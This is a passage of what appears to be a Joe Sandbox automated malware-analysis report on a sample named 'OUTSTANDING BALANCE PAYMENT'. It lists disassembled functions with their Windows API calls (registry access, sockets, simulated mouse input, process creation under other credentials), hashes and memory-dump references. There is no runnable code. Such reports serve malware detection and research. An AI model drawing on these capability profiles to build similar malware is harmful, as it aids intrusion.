                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                  • String ID:
                                                                  • API String ID: 1380811348-0
                                                                  • Opcode ID: 3fcdcf5b5fdf6420d6a71cfcbb2bb62b7471536dba4cc8a884d5060313261ae3
                                                                  • Instruction ID: 011bb8b32e73e52e020f7ea008b3bff12122c43b9db92aebbe1ea8c7c296c844
                                                                  • Opcode Fuzzy Hash: 3fcdcf5b5fdf6420d6a71cfcbb2bb62b7471536dba4cc8a884d5060313261ae3
                                                                  • Instruction Fuzzy Hash: 91518D711143419FD720EF24C895EABB7ECEF88754F10492EF58697291EB30D924CBA2
                                                                  Function 002E2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E2BB5,?,?), ref: 002E3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E30AF
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002E30EF
                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002E3112
                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002E313B
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 002E317E
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 002E318B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                  • String ID:
                                                                  • API String ID: 3451389628-0
                                                                  • Opcode ID: a0439f1a7984ede32931c39fdbb188849be6d1f0660f8cbdb1cf7fd5989fb941
                                                                  • Instruction ID: 3ebd7b7d83b6769c2a0dcb2981f205fc1578b3949eb04095e186b4de6ade8be4
                                                                  • Opcode Fuzzy Hash: a0439f1a7984ede32931c39fdbb188849be6d1f0660f8cbdb1cf7fd5989fb941
                                                                  • Instruction Fuzzy Hash: 64518931125340AFC700EF64C895E6ABBE9FF88304F04491DF5498B2A1DB71EA29CF52
                                                                  Function 002E84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenu.USER32(?), ref: 002E8540
                                                                  • GetMenuItemCount.USER32(00000000), ref: 002E8577
                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002E859F
                                                                  • GetMenuItemID.USER32(?,?), ref: 002E860E
                                                                  • GetSubMenu.USER32(?,?), ref: 002E861C
                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 002E866D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                  • String ID:
                                                                  • API String ID: 650687236-0
                                                                  • Opcode ID: c853248cc679a74969849121ce7ee78c67b9c9bd9fe448503d9e5f8f2e7ba70b
                                                                  • Instruction ID: 7dfc2cc0b68eaecd66f456130aea38a41fee98d83c132229aee226bf08f6d9f0
                                                                  • Opcode Fuzzy Hash: c853248cc679a74969849121ce7ee78c67b9c9bd9fe448503d9e5f8f2e7ba70b
                                                                  • Instruction Fuzzy Hash: 5351AB35A10215AFCF11EFA5C841AAEB7F8AF08310F51445AE94ABB291CF70AE508F90
                                                                  Function 002C4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002C4B10
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002C4B5B
                                                                  • IsMenu.USER32(00000000), ref: 002C4B7B
                                                                  • CreatePopupMenu.USER32 ref: 002C4BAF
                                                                  • GetMenuItemCount.USER32(000000FF), ref: 002C4C0D
                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 002C4C3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                  • String ID:
                                                                  • API String ID: 3311875123-0
                                                                  • Opcode ID: 70b666348e59e268a5bbb3cb140f36f44a4513b8b0afedc84ac7e0e37381b79f
                                                                  • Instruction ID: 9e4dbff39c776dfe8a75059e0a0a14887fe69a41bcd51c99bb321f9b8098f0bd
                                                                  • Opcode Fuzzy Hash: 70b666348e59e268a5bbb3cb140f36f44a4513b8b0afedc84ac7e0e37381b79f
                                                                  • Instruction Fuzzy Hash: B451C470A1120ADBDF20EF64C894FAEBBF4AF45318F14425EE415972A1D3719E64CB51
                                                                  Function 002D8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0031DC00), ref: 002D8E7C
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D8E89
                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 002D8EAD
                                                                  • #16.WSOCK32(?,?,00000000,00000000), ref: 002D8EC5
                                                                  • _strlen.LIBCMT ref: 002D8EF7
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D8F6A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_strlenselect
                                                                  • String ID:
                                                                  • API String ID: 2217125717-0
                                                                  • Opcode ID: fc3aef699e5ed03f143702bcfa00427c6165888fdb8a2402aa08cf1654936b16
                                                                  • Instruction ID: e5ae2582bdc0aad7df90cfc81abbf188cad79eb7309fe39c7a168a722fa15184
                                                                  • Opcode Fuzzy Hash: fc3aef699e5ed03f143702bcfa00427c6165888fdb8a2402aa08cf1654936b16
                                                                  • Instruction Fuzzy Hash: C941BF75510104AFCB14EFA4CD95EAEB7B9AF08314F20465AF51A972D1DF30AE10CF60
                                                                  Function 0029ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • BeginPaint.USER32(?,?,?), ref: 0029AC2A
                                                                  • GetWindowRect.USER32(?,?), ref: 0029AC8E
                                                                  • ScreenToClient.USER32(?,?), ref: 0029ACAB
                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0029ACBC
                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 0029AD06
                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002FE673
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                  • String ID:
                                                                  • API String ID: 2592858361-0
                                                                  • Opcode ID: 64ffbf6b4c19d44630f521cccdec595c77b936a8c8cd9cabbb56842a7c156d0c
                                                                  • Instruction ID: 669451b1783fdce7f53f253da0d3c1d65e79a52258cd1522a65aed50398cf111
                                                                  • Opcode Fuzzy Hash: 64ffbf6b4c19d44630f521cccdec595c77b936a8c8cd9cabbb56842a7c156d0c
                                                                  • Instruction Fuzzy Hash: 0841F4701113059FCB12DF14CC84F767BECEF59360F040229FAA48B2A1C735A894CBA2
                                                                  Function 002EE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(00341628,00000000,00341628,00000000,00000000,00341628,?,002FDC5D,00000000,?,00000000,00000000,00000000,?,002FDAD1,00000004), ref: 002EE40B
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 002EE42F
                                                                  • ShowWindow.USER32(00341628,00000000), ref: 002EE48F
                                                                  • ShowWindow.USER32(00000000,00000004), ref: 002EE4A1
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 002EE4C5
                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 002EE4E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 642888154-0
                                                                  • Opcode ID: 7a1bde4fd9d10924f43a5caf3ad8aeac11d59112c328e68fec40afc8decaa0ab
                                                                  • Instruction ID: c6b234c3c351b7b375beeae813916cd84dba6003df05d445438b87259ed53b75
                                                                  • Opcode Fuzzy Hash: 7a1bde4fd9d10924f43a5caf3ad8aeac11d59112c328e68fec40afc8decaa0ab
                                                                  • Instruction Fuzzy Hash: 41418130641582EFDF22CF25D499B947BE1BF09304F9981B9EA588F2E2C731E851CB61
                                                                  Function 002C98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 002C98D1
                                                                    • Part of subcall function 0029F4EA: std::exception::exception.LIBCMT ref: 0029F51E
                                                                    • Part of subcall function 0029F4EA: __CxxThrowException@8.LIBCMT ref: 0029F533
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002C9908
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 002C9924
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 002C999E
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002C99B3
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 002C99D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 2537439066-0
                                                                  • Opcode ID: fb0998583eac523765a8c280966f11a8488b2fb96552816373fa33f78ca1ffd8
                                                                  • Instruction ID: 310c12524ba828109800162c35ab72c6fd3b2c57364e9ef63ade26ba9664733d
                                                                  • Opcode Fuzzy Hash: fb0998583eac523765a8c280966f11a8488b2fb96552816373fa33f78ca1ffd8
                                                                  • Instruction Fuzzy Hash: AD316E31900205EBDF419FA4DD85E6BB7B8FF44310F1480A9E905AA246D770DA20DBA0
                                                                  Function 002D9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,002D77F4,?,?,00000000,00000001), ref: 002D9B53
                                                                    • Part of subcall function 002D6544: GetWindowRect.USER32(?,?), ref: 002D6557
                                                                  • GetDesktopWindow.USER32 ref: 002D9B7D
                                                                  • GetWindowRect.USER32(00000000), ref: 002D9B84
                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002D9BB6
                                                                    • Part of subcall function 002C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002C7AD0
                                                                  • GetCursorPos.USER32(?), ref: 002D9BE2
                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002D9C44
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                  • String ID:
                                                                  • API String ID: 4137160315-0
                                                                  • Opcode ID: 28c7aa84e72e4f6366e8e2ef20068021edd6b9aa3bc72da53124b0e34bc2f8cd
                                                                  • Instruction ID: 07da4f1dc10a48230c012eef5d26a1ec9d46010871ac1db569e429a04c7364dc
                                                                  • Opcode Fuzzy Hash: 28c7aa84e72e4f6366e8e2ef20068021edd6b9aa3bc72da53124b0e34bc2f8cd
                                                                  • Instruction Fuzzy Hash: 2A31BE7211430AABC710DF589C49F9AB7EDFF89314F000A1BF585A7281D671E958CB91
                                                                  Function 002BAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002BAFAE
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 002BAFB5
                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002BAFC4
                                                                  • CloseHandle.KERNEL32(00000004), ref: 002BAFCF
                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002BAFFE
                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 002BB012
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                  • String ID:
                                                                  • API String ID: 1413079979-0
                                                                  • Opcode ID: ed7ba41f4392c2081370a9d729d9838068c5650f667a1f9aa5887858a2ebbbf3
                                                                  • Instruction ID: 6aaf925ddedb5f501ddba65ff821ac8da5b08cc7c29cdaf732a6a24823aa9557
                                                                  • Opcode Fuzzy Hash: ed7ba41f4392c2081370a9d729d9838068c5650f667a1f9aa5887858a2ebbbf3
                                                                  • Instruction Fuzzy Hash: 0D2179B211120AABCB028FA4ED09BEE7BA9AB44344F044016FA01A2161C3B6DD20EB61
                                                                  Function 002EEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0029AFE3
                                                                    • Part of subcall function 0029AF83: SelectObject.GDI32(?,00000000), ref: 0029AFF2
                                                                    • Part of subcall function 0029AF83: BeginPath.GDI32(?), ref: 0029B009
                                                                    • Part of subcall function 0029AF83: SelectObject.GDI32(?,00000000), ref: 0029B033
                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 002EEC20
                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 002EEC34
                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002EEC42
                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 002EEC52
                                                                  • EndPath.GDI32(00000000), ref: 002EEC62
                                                                  • StrokePath.GDI32(00000000), ref: 002EEC72
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                  • String ID:
                                                                  • API String ID: 43455801-0
                                                                  • Opcode ID: 5640e9006ef0a0821938d5b43e2a4ebaa6c10f0e4b48c7c89b12f05ac9558a50
                                                                  • Instruction ID: c3e73f1dcc522921b5399d0b636aa3e15369bbaa0262c845865427cdb511d0e4
                                                                  • Opcode Fuzzy Hash: 5640e9006ef0a0821938d5b43e2a4ebaa6c10f0e4b48c7c89b12f05ac9558a50
                                                                  • Instruction Fuzzy Hash: FD111B7600114DBFEF129F90DC88EEA7FADEB08350F148112BE0989160D7719D55DBA0
                                                                  Function 002BE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 002BE1C0
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 002BE1D1
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002BE1D8
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 002BE1E0
                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002BE1F7
                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 002BE209
                                                                    • Part of subcall function 002B9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,002B9A05,00000000,00000000,?,002B9DDB), ref: 002BA53A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                                  • String ID:
                                                                  • API String ID: 603618608-0
                                                                  • Opcode ID: 7c4bcd94ae15745f4905b61182e7e43d7f7e5f0640fce0113c4b7b157c3087b8
                                                                  • Instruction ID: b66a657b0ecbc1a69a8f1c3896207457851f328e06745aed1460bc79e4d55738
                                                                  • Opcode Fuzzy Hash: 7c4bcd94ae15745f4905b61182e7e43d7f7e5f0640fce0113c4b7b157c3087b8
                                                                  • Instruction Fuzzy Hash: D20184B5A00219BFEF109FE59C45B9EBFB8EB48351F004066EA08A7290D6719C00CFA0
                                                                  Function 002A7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __init_pointers.LIBCMT ref: 002A7B47
                                                                    • Part of subcall function 002A123A: __initp_misc_winsig.LIBCMT ref: 002A125E
                                                                    • Part of subcall function 002A123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002A7F51
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 002A7F65
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 002A7F78
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 002A7F8B
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 002A7F9E
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 002A7FB1
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 002A7FC4
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 002A7FD7
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 002A7FEA
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 002A7FFD
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 002A8010
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 002A8023
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 002A8036
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 002A8049
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 002A805C
                                                                    • Part of subcall function 002A123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 002A806F
                                                                  • __mtinitlocks.LIBCMT ref: 002A7B4C
                                                                    • Part of subcall function 002A7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0033AC68,00000FA0,?,?,002A7B51,002A5E77,00336C70,00000014), ref: 002A7E41
                                                                  • __mtterm.LIBCMT ref: 002A7B55
                                                                    • Part of subcall function 002A7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002A7B5A,002A5E77,00336C70,00000014), ref: 002A7D3F
                                                                    • Part of subcall function 002A7BBD: _free.LIBCMT ref: 002A7D46
                                                                    • Part of subcall function 002A7BBD: DeleteCriticalSection.KERNEL32(0033AC68,?,?,002A7B5A,002A5E77,00336C70,00000014), ref: 002A7D68
                                                                  • __calloc_crt.LIBCMT ref: 002A7B7A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 002A7BA3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                  • String ID:
                                                                  • API String ID: 2942034483-0
                                                                  • Opcode ID: 9af0cd3624e1ec2b918049f256f770244f3ef5d3937ccbc741afd48951ae1abd
